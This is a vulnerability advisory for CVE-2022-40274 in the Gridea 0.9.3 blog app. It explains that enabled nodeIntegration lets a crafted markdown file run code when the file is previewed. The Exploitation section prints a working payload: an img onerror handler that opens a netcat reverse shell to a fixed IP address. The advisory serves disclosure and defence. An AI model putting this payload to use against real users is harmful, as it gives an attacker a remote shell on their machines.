Gridea 0.9.3 - RCE via nodeIntegration feature

Summary

NameGridea 0.9.3 - RCE via nodeIntegration feature
Code nameMarshmello
ProductGridea
Affected versionsVersion 0.9.3
StatePublic
Release date2022-09-26

Vulnerability

KindRemote command execution
Rule004. Remote command execution
RemoteYes
CVSSv3 VectorCVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
CVSSv3 Base Score8.6
Exploit availableYes
CVE ID(s)CVE-2022-40274

Description

Gridea version 0.9.3 allows an external attacker to execute arbitrary code remotely on any client attempting to view a malicious markdown file through Gridea. This is possible because the application has the "nodeIntegration" option enabled.

Vulnerability

This vulnerability occurs because the application has the "nodeIntegration" option enabled. Due to the above, an attacker can embed malicious JS code in a markdown file and send it to the victim for viewing to achieve an RCE.

Exploitation

To exploit this vulnerability, you must send the following file to a user to open with Gridea. The exploit is triggered when the user presses "CTRL+P" or simply clicks "preview".

exploit.md

<img src=1 onerror="require('child_process').exec('nc 192.168.20.38 4444 -e /bin/bash');"/>

Evidence of exploitation

RCE-Gridea

Our security police

We have reserved the CVE-2022-40274 to refer to this issue from now on.

System Information

  • Version: Gridea 0.9.3

  • Operating System: GNU/Linux

Mitigation

There is currently no patch available for this vulnerability.

Credits

The vulnerability was discovered by Carlos Bello from the Offensive Team of Fluid Attacks.

References

Vendor page https://github.com/getgridea/gridea

Timeline

Time-lapse-logo

2022-09-08

Vulnerability discovered.

Time-lapse-logo

2022-09-08

Vendor contacted.

Time-lapse-logo

2022-09-26

Public Disclosure.